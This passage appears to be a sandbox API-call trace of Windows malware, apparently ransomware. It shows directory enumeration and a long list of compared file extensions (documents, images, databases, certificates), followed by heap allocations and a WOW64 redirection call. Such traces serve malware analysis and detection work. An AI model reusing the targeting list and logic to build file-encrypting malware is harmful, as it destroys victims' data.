ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.908] FindNextFileW (in: hFindFile=0x6c4268, lpFindFileData=0x2f2eb9c | out: lpFindFileData=0x2f2eb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf9eaad0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf9eaad0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf9eaad0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", cAlternateFileName="024823~1")) returned 1 [0057.908] lstrlenW (lpString="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 65 [0057.908] lstrlenW (lpString=".1cd") returned 4 [0057.908] lstrcmpiW (lpString1=".1cd", lpString2="D91B") returned -1 [0057.908] lstrlenW (lpString=".3ds") returned 4 [0057.908] lstrcmpiW (lpString1=".3ds", lpString2="D91B") returned -1 [0057.908] lstrlenW (lpString=".3fr") returned 4 [0057.908] lstrcmpiW (lpString1=".3fr", lpString2="D91B") returned -1 [0057.908] lstrlenW (lpString=".3g2") returned 4 [0057.908] lstrcmpiW (lpString1=".3g2", lpString2="D91B") returned -1 [0057.908] lstrlenW (lpString=".3gp") returned 4 [0057.908] lstrcmpiW (lpString1=".3gp", lpString2="D91B") returned -1 [0057.908] lstrlenW (lpString=".7z") returned 3 [0057.908] lstrcmpiW (lpString1=".7z", lpString2="91B") returned -1 [0057.908] lstrlenW (lpString=".accda") returned 6 [0057.908] lstrcmpiW (lpString1=".accda", lpString2="09D91B") returned -1 [0057.908] lstrlenW (lpString=".accdb") returned 6 [0057.908] lstrcmpiW (lpString1=".accdb", lpString2="09D91B") returned -1 [0057.908] lstrlenW (lpString=".accdc") returned 6 [0057.908] lstrcmpiW (lpString1=".accdc", lpString2="09D91B") returned -1 [0057.908] lstrlenW (lpString=".accde") returned 6 [0057.908] lstrcmpiW (lpString1=".accde", lpString2="09D91B") returned -1 [0057.908] lstrlenW (lpString=".accdt") returned 6 [0057.908] lstrcmpiW (lpString1=".accdt", lpString2="09D91B") returned -1 [0057.908] lstrlenW (lpString=".accdw") returned 6 [0057.908] lstrcmpiW (lpString1=".accdw", lpString2="09D91B") returned -1 [0057.908] lstrlenW (lpString=".adb") returned 4 [0057.908] lstrcmpiW (lpString1=".adb", lpString2="D91B") returned -1 [0057.908] lstrlenW (lpString=".adp") returned 4 [0057.909] lstrcmpiW (lpString1=".adp", lpString2="D91B") returned -1 [0057.909] lstrlenW (lpString=".ai") returned 3 [0057.909] lstrcmpiW (lpString1=".ai", lpString2="91B") returned -1 [0057.909] lstrlenW (lpString=".ai3") returned 4 [0057.909] lstrcmpiW (lpString1=".ai3", lpString2="D91B") returned -1 [0057.909] lstrlenW (lpString=".ai4") returned 4 [0057.909] lstrcmpiW (lpString1=".ai4", lpString2="D91B") returned -1 [0057.909] lstrlenW (lpString=".ai5") returned 4 [0057.909] lstrcmpiW (lpString1=".ai5", lpString2="D91B") returned -1 [0057.909] lstrlenW (lpString=".ai6") returned 4 [0057.909] lstrcmpiW (lpString1=".ai6", lpString2="D91B") returned -1 [0057.909] lstrlenW (lpString=".ai7") returned 4 [0057.909] lstrcmpiW (lpString1=".ai7", lpString2="D91B") returned -1 [0057.909] lstrlenW (lpString=".ai8") returned 4 [0057.909] lstrcmpiW (lpString1=".ai8", lpString2="D91B") returned -1 [0057.909] lstrlenW (lpString=".anim") returned 5 [0057.909] lstrcmpiW (lpString1=".anim", lpString2="9D91B") returned -1 [0057.909] lstrlenW (lpString=".arw") returned 4 [0057.909] lstrcmpiW (lpString1=".arw", lpString2="D91B") returned -1 [0057.909] lstrlenW (lpString=".as") returned 3 [0057.909] lstrcmpiW (lpString1=".as", lpString2="91B") returned -1 [0057.909] lstrlenW (lpString=".asa") returned 4 [0057.909] lstrcmpiW (lpString1=".asa", lpString2="D91B") returned -1 [0057.909] lstrlenW (lpString=".asc") returned 4 [0057.909] lstrcmpiW (lpString1=".asc", lpString2="D91B") returned -1 [0057.909] lstrlenW (lpString=".ascx") returned 5 [0057.909] lstrcmpiW (lpString1=".ascx", lpString2="9D91B") returned -1 [0057.909] lstrlenW (lpString=".asm") returned 4 [0057.909] lstrcmpiW (lpString1=".asm", lpString2="D91B") returned -1 [0057.909] lstrlenW (lpString=".asmx") returned 5 [0057.909] lstrcmpiW (lpString1=".asmx", lpString2="9D91B") returned -1 [0057.909] lstrlenW (lpString=".asp") returned 4 [0057.910] lstrcmpiW (lpString1=".asp", lpString2="D91B") returned -1 [0057.910] lstrlenW (lpString=".aspx") returned 5 [0057.910] lstrcmpiW (lpString1=".aspx", lpString2="9D91B") returned -1 [0057.910] lstrlenW (lpString=".asr") returned 4 [0057.910] lstrcmpiW (lpString1=".asr", lpString2="D91B") returned -1 [0057.910] lstrlenW (lpString=".asx") returned 4 [0057.910] lstrcmpiW (lpString1=".asx", lpString2="D91B") returned -1 [0057.910] lstrlenW (lpString=".avi") returned 4 [0057.910] lstrcmpiW (lpString1=".avi", lpString2="D91B") returned -1 [0057.910] lstrlenW (lpString=".avs") returned 4 [0057.910] lstrcmpiW (lpString1=".avs", lpString2="D91B") returned -1 [0057.910] lstrlenW (lpString=".backup") returned 7 [0057.910] lstrcmpiW (lpString1=".backup", lpString2="E09D91B") returned -1 [0057.910] lstrlenW (lpString=".bak") returned 4 [0057.910] lstrcmpiW (lpString1=".bak", lpString2="D91B") returned -1 [0057.910] lstrlenW (lpString=".bay") returned 4 [0057.910] lstrcmpiW (lpString1=".bay", lpString2="D91B") returned -1 [0057.910] lstrlenW (lpString=".bd") returned 3 [0057.910] lstrcmpiW (lpString1=".bd", lpString2="91B") returned -1 [0057.910] lstrlenW (lpString=".bin") returned 4 [0057.910] lstrcmpiW (lpString1=".bin", lpString2="D91B") returned -1 [0057.910] lstrlenW (lpString=".bmp") returned 4 [0057.910] lstrcmpiW (lpString1=".bmp", lpString2="D91B") returned -1 [0057.910] lstrlenW (lpString=".bz2") returned 4 [0057.910] lstrcmpiW (lpString1=".bz2", lpString2="D91B") returned -1 [0057.910] lstrlenW (lpString=".c") returned 2 [0057.910] lstrcmpiW (lpString1=".c", lpString2="1B") returned -1 [0057.910] lstrlenW (lpString=".cdr") returned 4 [0057.910] lstrcmpiW (lpString1=".cdr", lpString2="D91B") returned -1 [0057.910] lstrlenW (lpString=".cer") returned 4 [0057.910] lstrcmpiW (lpString1=".cer", lpString2="D91B") returned -1 [0057.910] lstrlenW (lpString=".cf") returned 3 [0057.911] lstrcmpiW (lpString1=".cf", lpString2="91B") returned -1 [0057.911] lstrlenW (lpString=".cfc") returned 4 [0057.911] lstrcmpiW (lpString1=".cfc", lpString2="D91B") returned -1 [0057.911] lstrlenW (lpString=".cfm") returned 4 [0057.911] lstrcmpiW (lpString1=".cfm", lpString2="D91B") returned -1 [0057.911] lstrlenW (lpString=".cfml") returned 5 [0057.911] lstrcmpiW (lpString1=".cfml", lpString2="9D91B") returned -1 [0057.911] lstrlenW (lpString=".cfu") returned 4 [0057.911] lstrcmpiW (lpString1=".cfu", lpString2="D91B") returned -1 [0057.911] lstrlenW (lpString=".chm") returned 4 [0057.911] lstrcmpiW (lpString1=".chm", lpString2="D91B") returned -1 [0057.911] lstrlenW (lpString=".cin") returned 4 [0057.911] lstrcmpiW (lpString1=".cin", lpString2="D91B") returned -1 [0057.911] lstrlenW (lpString=".class") returned 6 [0057.911] lstrcmpiW (lpString1=".class", lpString2="09D91B") returned -1 [0057.911] lstrlenW (lpString=".clx") returned 4 [0057.911] lstrcmpiW (lpString1=".clx", lpString2="D91B") returned -1 [0057.911] lstrlenW (lpString=".config") returned 7 [0057.911] lstrcmpiW (lpString1=".config", lpString2="E09D91B") returned -1 [0057.911] lstrlenW (lpString=".cpp") returned 4 [0057.911] lstrcmpiW (lpString1=".cpp", lpString2="D91B") returned -1 [0057.911] lstrlenW (lpString=".cr2") returned 4 [0057.911] lstrcmpiW (lpString1=".cr2", lpString2="D91B") returned -1 [0057.911] lstrlenW (lpString=".crt") returned 4 [0057.911] lstrcmpiW (lpString1=".crt", lpString2="D91B") returned -1 [0057.911] lstrlenW (lpString=".crw") returned 4 [0057.911] lstrcmpiW (lpString1=".crw", lpString2="D91B") returned -1 [0057.911] lstrlenW (lpString=".cs") returned 3 [0057.911] lstrcmpiW (lpString1=".cs", lpString2="91B") returned -1 [0057.911] lstrlenW (lpString=".css") returned 4 [0057.911] lstrcmpiW (lpString1=".css", lpString2="D91B") returned -1 [0057.911] lstrlenW (lpString=".csv") returned 4 [0057.911] lstrcmpiW (lpString1=".csv", lpString2="D91B") returned -1 [0057.912] lstrlenW (lpString=".cub") returned 4 [0057.912] lstrcmpiW (lpString1=".cub", lpString2="D91B") returned -1 [0057.912] lstrlenW (lpString=".dae") returned 4 [0057.912] lstrcmpiW (lpString1=".dae", lpString2="D91B") returned -1 [0057.912] lstrlenW (lpString=".dat") returned 4 [0057.912] lstrcmpiW (lpString1=".dat", lpString2="D91B") returned -1 [0057.912] lstrlenW (lpString=".db") returned 3 [0057.912] lstrcmpiW (lpString1=".db", lpString2="91B") returned -1 [0057.912] lstrlenW (lpString=".dbf") returned 4 [0057.912] lstrcmpiW (lpString1=".dbf", lpString2="D91B") returned -1 [0057.912] lstrlenW (lpString=".dbx") returned 4 [0057.912] lstrcmpiW (lpString1=".dbx", lpString2="D91B") returned -1 [0057.912] lstrlenW (lpString=".dc3") returned 4 [0057.912] lstrcmpiW (lpString1=".dc3", lpString2="D91B") returned -1 [0057.912] lstrlenW (lpString=".dcm") returned 4 [0057.912] lstrcmpiW (lpString1=".dcm", lpString2="D91B") returned -1 [0057.912] lstrlenW (lpString=".dcr") returned 4 [0057.912] lstrcmpiW (lpString1=".dcr", lpString2="D91B") returned -1 [0057.912] lstrlenW (lpString=".der") returned 4 [0057.912] lstrcmpiW (lpString1=".der", lpString2="D91B") returned -1 [0057.912] lstrlenW (lpString=".dib") returned 4 [0057.912] lstrcmpiW (lpString1=".dib", lpString2="D91B") returned -1 [0057.912] lstrlenW (lpString=".dic") returned 4 [0057.912] lstrcmpiW (lpString1=".dic", lpString2="D91B") returned -1 [0057.912] lstrlenW (lpString=".dif") returned 4 [0057.912] lstrcmpiW (lpString1=".dif", lpString2="D91B") returned -1 [0057.912] lstrlenW (lpString=".divx") returned 5 [0057.912] lstrcmpiW (lpString1=".divx", lpString2="9D91B") returned -1 [0057.912] lstrlenW (lpString=".djvu") returned 5 [0057.912] lstrcmpiW (lpString1=".djvu", lpString2="9D91B") returned -1 [0057.912] lstrlenW (lpString=".dng") returned 4 [0057.912] lstrcmpiW (lpString1=".dng", lpString2="D91B") returned -1 [0057.912] lstrlenW (lpString=".doc") returned 4 [0057.912] lstrcmpiW (lpString1=".doc", lpString2="D91B") returned -1 [0057.913] lstrlenW (lpString=".docm") returned 5 [0057.913] lstrcmpiW (lpString1=".docm", lpString2="9D91B") returned -1 [0057.913] lstrlenW (lpString=".docx") returned 5 [0057.913] lstrcmpiW (lpString1=".docx", lpString2="9D91B") returned -1 [0057.913] lstrlenW (lpString=".dot") returned 4 [0057.913] lstrcmpiW (lpString1=".dot", lpString2="D91B") returned -1 [0057.913] lstrlenW (lpString=".dotm") returned 5 [0057.913] lstrcmpiW (lpString1=".dotm", lpString2="9D91B") returned -1 [0057.913] lstrlenW (lpString=".dotx") returned 5 [0057.913] lstrcmpiW (lpString1=".dotx", lpString2="9D91B") returned -1 [0057.913] lstrlenW (lpString=".dpx") returned 4 [0057.913] lstrcmpiW (lpString1=".dpx", lpString2="D91B") returned -1 [0057.913] lstrlenW (lpString=".dqy") returned 4 [0057.913] lstrcmpiW (lpString1=".dqy", lpString2="D91B") returned -1 [0057.913] lstrlenW (lpString=".dsn") returned 4 [0057.913] lstrcmpiW (lpString1=".dsn", lpString2="D91B") returned -1 [0057.913] lstrlenW (lpString=".dt") returned 3 [0057.913] lstrcmpiW (lpString1=".dt", lpString2="91B") returned -1 [0057.913] lstrlenW (lpString=".dtd") returned 4 [0057.913] lstrcmpiW (lpString1=".dtd", lpString2="D91B") returned -1 [0057.913] lstrlenW (lpString=".dwg") returned 4 [0057.913] lstrcmpiW (lpString1=".dwg", lpString2="D91B") returned -1 [0057.913] lstrlenW (lpString=".dwt") returned 4 [0057.913] lstrcmpiW (lpString1=".dwt", lpString2="D91B") returned -1 [0057.913] lstrlenW (lpString=".dx") returned 3 [0057.913] lstrcmpiW (lpString1=".dx", lpString2="91B") returned -1 [0057.913] lstrlenW (lpString=".dxf") returned 4 [0057.913] lstrcmpiW (lpString1=".dxf", lpString2="D91B") returned -1 [0057.913] lstrlenW (lpString=".edml") returned 5 [0057.913] lstrcmpiW (lpString1=".edml", lpString2="9D91B") returned -1 [0057.913] lstrlenW (lpString=".efd") returned 4 [0057.913] lstrcmpiW (lpString1=".efd", lpString2="D91B") returned -1 [0057.913] lstrlenW (lpString=".elf") returned 4 [0057.914] lstrcmpiW (lpString1=".elf", lpString2="D91B") returned -1 [0057.914] lstrlenW (lpString=".emf") returned 4 [0057.914] lstrcmpiW (lpString1=".emf", lpString2="D91B") returned -1 [0057.914] lstrlenW (lpString=".emz") returned 4 [0057.914] lstrcmpiW (lpString1=".emz", lpString2="D91B") returned -1 [0057.914] lstrlenW (lpString=".epf") returned 4 [0057.914] lstrcmpiW (lpString1=".epf", lpString2="D91B") returned -1 [0057.914] lstrlenW (lpString=".eps") returned 4 [0057.914] lstrcmpiW (lpString1=".eps", lpString2="D91B") returned -1 [0057.914] lstrlenW (lpString=".epsf") returned 5 [0057.914] lstrcmpiW (lpString1=".epsf", lpString2="9D91B") returned -1 [0057.914] lstrlenW (lpString=".epsp") returned 5 [0057.914] lstrcmpiW (lpString1=".epsp", lpString2="9D91B") returned -1 [0057.914] lstrlenW (lpString=".erf") returned 4 [0057.914] lstrcmpiW (lpString1=".erf", lpString2="D91B") returned -1 [0057.914] lstrlenW (lpString=".exr") returned 4 [0057.914] lstrcmpiW (lpString1=".exr", lpString2="D91B") returned -1 [0057.914] lstrlenW (lpString=".f4v") returned 4 [0057.914] lstrcmpiW (lpString1=".f4v", lpString2="D91B") returned -1 [0057.914] lstrlenW (lpString=".fido") returned 5 [0057.914] lstrcmpiW (lpString1=".fido", lpString2="9D91B") returned -1 [0057.914] lstrlenW (lpString=".flm") returned 4 [0057.914] lstrcmpiW (lpString1=".flm", lpString2="D91B") returned -1 [0057.914] lstrlenW (lpString=".flv") returned 4 [0057.914] lstrcmpiW (lpString1=".flv", lpString2="D91B") returned -1 [0057.914] lstrlenW (lpString=".frm") returned 4 [0057.914] lstrcmpiW (lpString1=".frm", lpString2="D91B") returned -1 [0057.914] lstrlenW (lpString=".fxg") returned 4 [0057.914] lstrcmpiW (lpString1=".fxg", lpString2="D91B") returned -1 [0057.914] lstrlenW (lpString=".geo") returned 4 [0057.914] lstrcmpiW (lpString1=".geo", lpString2="D91B") returned -1 [0057.915] lstrlenW (lpString=".gif") returned 4 [0057.915] lstrcmpiW (lpString1=".gif", lpString2="D91B") returned -1 [0057.915] lstrlenW (lpString=".grs") returned 4 [0057.915] lstrcmpiW (lpString1=".grs", lpString2="D91B") returned -1 [0057.915] lstrlenW (lpString=".gz") returned 3 [0057.915] lstrcmpiW (lpString1=".gz", lpString2="91B") returned -1 [0057.915] lstrlenW (lpString=".h") returned 2 [0057.915] lstrcmpiW (lpString1=".h", lpString2="1B") returned -1 [0057.915] lstrlenW (lpString=".hdr") returned 4 [0057.915] lstrcmpiW (lpString1=".hdr", lpString2="D91B") returned -1 [0057.915] lstrlenW (lpString=".hpp") returned 4 [0057.915] lstrcmpiW (lpString1=".hpp", lpString2="D91B") returned -1 [0057.915] lstrlenW (lpString=".hta") returned 4 [0057.915] lstrcmpiW (lpString1=".hta", lpString2="D91B") returned -1 [0057.915] lstrlenW (lpString=".htc") returned 4 [0057.915] lstrcmpiW (lpString1=".htc", lpString2="D91B") returned -1 [0057.915] lstrlenW (lpString=".htm") returned 4 [0057.915] lstrcmpiW (lpString1=".htm", lpString2="D91B") returned -1 [0057.915] lstrlenW (lpString=".html") returned 5 [0057.915] lstrcmpiW (lpString1=".html", lpString2="9D91B") returned -1 [0057.915] lstrlenW (lpString=".icb") returned 4 [0057.915] lstrcmpiW (lpString1=".icb", lpString2="D91B") returned -1 [0057.915] lstrlenW (lpString=".ics") returned 4 [0057.915] lstrcmpiW (lpString1=".ics", lpString2="D91B") returned -1 [0057.915] lstrlenW (lpString=".iff") returned 4 [0057.915] lstrcmpiW (lpString1=".iff", lpString2="D91B") returned -1 [0057.915] lstrlenW (lpString=".inc") returned 4 [0057.915] lstrcmpiW (lpString1=".inc", lpString2="D91B") returned -1 [0057.915] lstrlenW (lpString=".indd") returned 5 [0057.915] lstrcmpiW (lpString1=".indd", lpString2="9D91B") returned -1 [0057.915] lstrlenW (lpString=".ini") returned 4 [0057.915] lstrcmpiW (lpString1=".ini", lpString2="D91B") returned -1 [0057.915] lstrlenW (lpString=".iqy") returned 4 [0057.916] lstrcmpiW (lpString1=".iqy", lpString2="D91B") returned -1 [0057.916] lstrlenW (lpString=".j2c") returned 4 [0057.916] lstrcmpiW (lpString1=".j2c", lpString2="D91B") returned -1 [0057.916] lstrlenW (lpString=".j2k") returned 4 [0057.916] lstrcmpiW (lpString1=".j2k", lpString2="D91B") returned -1 [0057.916] lstrlenW (lpString=".java") returned 5 [0057.916] lstrcmpiW (lpString1=".java", lpString2="9D91B") returned -1 [0057.916] lstrlenW (lpString=".jp2") returned 4 [0057.916] lstrcmpiW (lpString1=".jp2", lpString2="D91B") returned -1 [0057.916] lstrlenW (lpString=".jpc") returned 4 [0057.916] lstrcmpiW (lpString1=".jpc", lpString2="D91B") returned -1 [0057.916] lstrlenW (lpString=".jpe") returned 4 [0057.916] lstrcmpiW (lpString1=".jpe", lpString2="D91B") returned -1 [0057.916] lstrlenW (lpString=".jpeg") returned 5 [0057.916] lstrcmpiW (lpString1=".jpeg", lpString2="9D91B") returned -1 [0057.916] lstrlenW (lpString=".jpf") returned 4 [0057.916] lstrcmpiW (lpString1=".jpf", lpString2="D91B") returned -1 [0057.916] lstrlenW (lpString=".jpg") returned 4 [0057.916] lstrcmpiW (lpString1=".jpg", lpString2="D91B") returned -1 [0057.916] lstrlenW (lpString=".jpx") returned 4 [0057.916] lstrcmpiW (lpString1=".jpx", lpString2="D91B") returned -1 [0057.916] lstrlenW (lpString=".js") returned 3 [0057.916] lstrcmpiW (lpString1=".js", lpString2="91B") returned -1 [0057.916] lstrlenW (lpString=".jsf") returned 4 [0057.916] lstrcmpiW (lpString1=".jsf", lpString2="D91B") returned -1 [0057.916] lstrlenW (lpString=".json") returned 5 [0057.916] lstrcmpiW (lpString1=".json", lpString2="9D91B") returned -1 [0057.916] lstrlenW (lpString=".jsp") returned 4 [0057.916] lstrcmpiW (lpString1=".jsp", lpString2="D91B") returned -1 [0057.916] lstrlenW (lpString=".kdc") returned 4 [0057.916] lstrcmpiW (lpString1=".kdc", lpString2="D91B") returned -1 [0057.916] lstrlenW (lpString=".kmz") returned 4 [0057.916] lstrcmpiW (lpString1=".kmz", lpString2="D91B") returned -1 [0057.917] lstrlenW (lpString=".kwm") returned 4 [0057.917] lstrcmpiW (lpString1=".kwm", lpString2="D91B") returned -1 [0057.917] lstrlenW (lpString=".lasso") returned 6 [0057.917] lstrcmpiW (lpString1=".lasso", lpString2="09D91B") returned -1 [0057.917] lstrlenW (lpString=".lbi") returned 4 [0057.917] lstrcmpiW (lpString1=".lbi", lpString2="D91B") returned -1 [0057.917] lstrlenW (lpString=".lgf") returned 4 [0057.917] lstrcmpiW (lpString1=".lgf", lpString2="D91B") returned -1 [0057.917] lstrlenW (lpString=".lgp") returned 4 [0057.917] lstrcmpiW (lpString1=".lgp", lpString2="D91B") returned -1 [0057.917] lstrlenW (lpString=".log") returned 4 [0057.917] lstrcmpiW (lpString1=".log", lpString2="D91B") returned -1 [0057.917] lstrlenW (lpString=".m1v") returned 4 [0057.917] lstrcmpiW (lpString1=".m1v", lpString2="D91B") returned -1 [0057.917] lstrlenW (lpString=".m4a") returned 4 [0057.917] lstrcmpiW (lpString1=".m4a", lpString2="D91B") returned -1 [0057.917] lstrlenW (lpString=".m4v") returned 4 [0057.917] lstrcmpiW (lpString1=".m4v", lpString2="D91B") returned -1 [0057.917] lstrlenW (lpString=".max") returned 4 [0057.917] lstrcmpiW (lpString1=".max", lpString2="D91B") returned -1 [0057.917] lstrlenW (lpString=".md") returned 3 [0057.917] lstrcmpiW (lpString1=".md", lpString2="91B") returned -1 [0057.917] lstrlenW (lpString=".mda") returned 4 [0057.917] lstrcmpiW (lpString1=".mda", lpString2="D91B") returned -1 [0057.917] lstrlenW (lpString=".mdb") returned 4 [0057.917] lstrcmpiW (lpString1=".mdb", lpString2="D91B") returned -1 [0057.917] lstrlenW (lpString=".mde") returned 4 [0057.917] lstrcmpiW (lpString1=".mde", lpString2="D91B") returned -1 [0057.917] lstrlenW (lpString=".mdf") returned 4 [0057.917] lstrcmpiW (lpString1=".mdf", lpString2="D91B") returned -1 [0057.917] lstrlenW (lpString=".mdw") returned 4 [0057.917] lstrcmpiW (lpString1=".mdw", lpString2="D91B") returned -1 [0057.917] lstrlenW (lpString=".mef") returned 4 [0057.918] lstrcmpiW (lpString1=".mef", lpString2="D91B") returned -1 [0057.918] lstrlenW (lpString=".mft") returned 4 [0057.918] lstrcmpiW (lpString1=".mft", lpString2="D91B") returned -1 [0057.918] lstrlenW (lpString=".mfw") returned 4 [0057.918] lstrcmpiW (lpString1=".mfw", lpString2="D91B") returned -1 [0057.918] lstrlenW (lpString=".mht") returned 4 [0057.918] lstrcmpiW (lpString1=".mht", lpString2="D91B") returned -1 [0057.918] lstrlenW (lpString=".mhtml") returned 6 [0057.918] lstrcmpiW (lpString1=".mhtml", lpString2="09D91B") returned -1 [0057.918] lstrlenW (lpString=".mka") returned 4 [0057.918] lstrcmpiW (lpString1=".mka", lpString2="D91B") returned -1 [0057.918] lstrlenW (lpString=".mkidx") returned 6 [0057.918] lstrcmpiW (lpString1=".mkidx", lpString2="09D91B") returned -1 [0057.918] lstrlenW (lpString=".mkv") returned 4 [0057.918] lstrcmpiW (lpString1=".mkv", lpString2="D91B") returned -1 [0057.918] lstrlenW (lpString=".mos") returned 4 [0057.918] lstrcmpiW (lpString1=".mos", lpString2="D91B") returned -1 [0057.918] lstrlenW (lpString=".mov") returned 4 [0057.918] lstrcmpiW (lpString1=".mov", lpString2="D91B") returned -1 [0057.918] lstrlenW (lpString=".mp3") returned 4 [0057.918] lstrcmpiW (lpString1=".mp3", lpString2="D91B") returned -1 [0057.918] lstrlenW (lpString=".mp4") returned 4 [0057.918] lstrcmpiW (lpString1=".mp4", lpString2="D91B") returned -1 [0057.918] lstrlenW (lpString=".mpeg") returned 5 [0057.918] lstrcmpiW (lpString1=".mpeg", lpString2="9D91B") returned -1 [0057.918] lstrlenW (lpString=".mpg") returned 4 [0057.918] lstrcmpiW (lpString1=".mpg", lpString2="D91B") returned -1 [0057.918] lstrlenW (lpString=".mpv") returned 4 [0057.918] lstrcmpiW (lpString1=".mpv", lpString2="D91B") returned -1 [0057.918] lstrlenW (lpString=".mrw") returned 4 [0057.918] lstrcmpiW (lpString1=".mrw", lpString2="D91B") returned -1 [0057.918] lstrlenW (lpString=".msg") returned 4 [0057.918] lstrcmpiW (lpString1=".msg", lpString2="D91B") returned -1 [0057.919] lstrlenW (lpString=".mxl") returned 4 [0057.919] lstrcmpiW (lpString1=".mxl", lpString2="D91B") returned -1 [0057.919] lstrlenW (lpString=".myd") returned 4 [0057.919] lstrcmpiW (lpString1=".myd", lpString2="D91B") returned -1 [0057.919] lstrlenW (lpString=".myi") returned 4 [0057.919] lstrcmpiW (lpString1=".myi", lpString2="D91B") returned -1 [0057.919] lstrlenW (lpString=".nef") returned 4 [0057.919] lstrcmpiW (lpString1=".nef", lpString2="D91B") returned -1 [0057.919] lstrlenW (lpString=".nrw") returned 4 [0057.919] lstrcmpiW (lpString1=".nrw", lpString2="D91B") returned -1 [0057.919] lstrlenW (lpString=".obj") returned 4 [0057.919] lstrcmpiW (lpString1=".obj", lpString2="D91B") returned -1 [0057.919] lstrlenW (lpString=".odb") returned 4 [0057.919] lstrcmpiW (lpString1=".odb", lpString2="D91B") returned -1 [0057.919] lstrlenW (lpString=".odc") returned 4 [0057.919] lstrcmpiW (lpString1=".odc", lpString2="D91B") returned -1 [0057.919] lstrlenW (lpString=".odm") returned 4 [0057.919] lstrcmpiW (lpString1=".odm", lpString2="D91B") returned -1 [0057.919] lstrlenW (lpString=".odp") returned 4 [0057.919] lstrcmpiW (lpString1=".odp", lpString2="D91B") returned -1 [0057.919] lstrlenW (lpString=".ods") returned 4 [0057.919] lstrcmpiW (lpString1=".ods", lpString2="D91B") returned -1 [0057.919] lstrlenW (lpString=".oft") returned 4 [0057.919] lstrcmpiW (lpString1=".oft", lpString2="D91B") returned -1 [0057.919] lstrlenW (lpString=".one") returned 4 [0057.919] lstrcmpiW (lpString1=".one", lpString2="D91B") returned -1 [0057.919] lstrlenW (lpString=".onepkg") returned 7 [0057.919] lstrcmpiW (lpString1=".onepkg", lpString2="E09D91B") returned -1 [0057.919] lstrlenW (lpString=".onetoc2") returned 8 [0057.919] lstrcmpiW (lpString1=".onetoc2", lpString2="BE09D91B") returned -1 [0057.919] lstrlenW (lpString=".opt") returned 4 [0057.919] lstrcmpiW (lpString1=".opt", lpString2="D91B") returned -1 [0057.919] lstrlenW (lpString=".oqy") returned 4 [0057.919] lstrcmpiW (lpString1=".oqy", lpString2="D91B") returned -1 [0057.920] lstrlenW (lpString=".orf") returned 4 [0057.920] lstrcmpiW (lpString1=".orf", lpString2="D91B") returned -1 [0057.920] lstrlenW (lpString=".p12") returned 4 [0057.920] lstrcmpiW (lpString1=".p12", lpString2="D91B") returned -1 [0057.920] lstrlenW (lpString=".p7b") returned 4 [0057.920] lstrcmpiW (lpString1=".p7b", lpString2="D91B") returned -1 [0057.920] lstrlenW (lpString=".p7c") returned 4 [0057.920] lstrcmpiW (lpString1=".p7c", lpString2="D91B") returned -1 [0057.920] lstrlenW (lpString=".pam") returned 4 [0057.920] lstrcmpiW (lpString1=".pam", lpString2="D91B") returned -1 [0057.920] lstrlenW (lpString=".pbm") returned 4 [0057.920] lstrcmpiW (lpString1=".pbm", lpString2="D91B") returned -1 [0057.920] lstrlenW (lpString=".pct") returned 4 [0057.920] lstrcmpiW (lpString1=".pct", lpString2="D91B") returned -1 [0057.920] lstrlenW (lpString=".pcx") returned 4 [0057.920] lstrcmpiW (lpString1=".pcx", lpString2="D91B") returned -1 [0057.920] lstrlenW (lpString=".pdd") returned 4 [0057.920] lstrcmpiW (lpString1=".pdd", lpString2="D91B") returned -1 [0057.920] lstrlenW (lpString=".pdf") returned 4 [0057.920] lstrcmpiW (lpString1=".pdf", lpString2="D91B") returned -1 [0057.920] lstrlenW (lpString=".pdp") returned 4 [0057.920] lstrcmpiW (lpString1=".pdp", lpString2="D91B") returned -1 [0057.920] lstrlenW (lpString=".pef") returned 4 [0057.920] lstrcmpiW (lpString1=".pef", lpString2="D91B") returned -1 [0057.920] lstrlenW (lpString=".pem") returned 4 [0057.920] lstrcmpiW (lpString1=".pem", lpString2="D91B") returned -1 [0057.920] lstrlenW (lpString=".pff") returned 4 [0057.920] lstrcmpiW (lpString1=".pff", lpString2="D91B") returned -1 [0057.920] lstrlenW (lpString=".pfm") returned 4 [0057.920] lstrcmpiW (lpString1=".pfm", lpString2="D91B") returned -1 Thread: id = 15 os_tid = 0x9b8 [0034.617] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x37d0290 [0034.617] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x37e0298 [0034.618] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670268 [0034.618] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x624108 [0034.618] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670280 [0034.618] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x3ab0020 [0034.618] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670298 [0034.618] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x670298, Size=0x20) returned 0x626848 [0034.618] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670298 [0034.618] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x670298, Size=0x20) returned 0x626870 [0034.618] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0034.618] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0034.618] Wow64DisableWow64FsRedirection (in: OldValue=0x306ff58 | out: OldValue=0x306ff58*=0x0) returned 1 [0034.618] lstrlenW (lpString="kernel32.dll") returned 12 [0034.618] HeapFree (in: 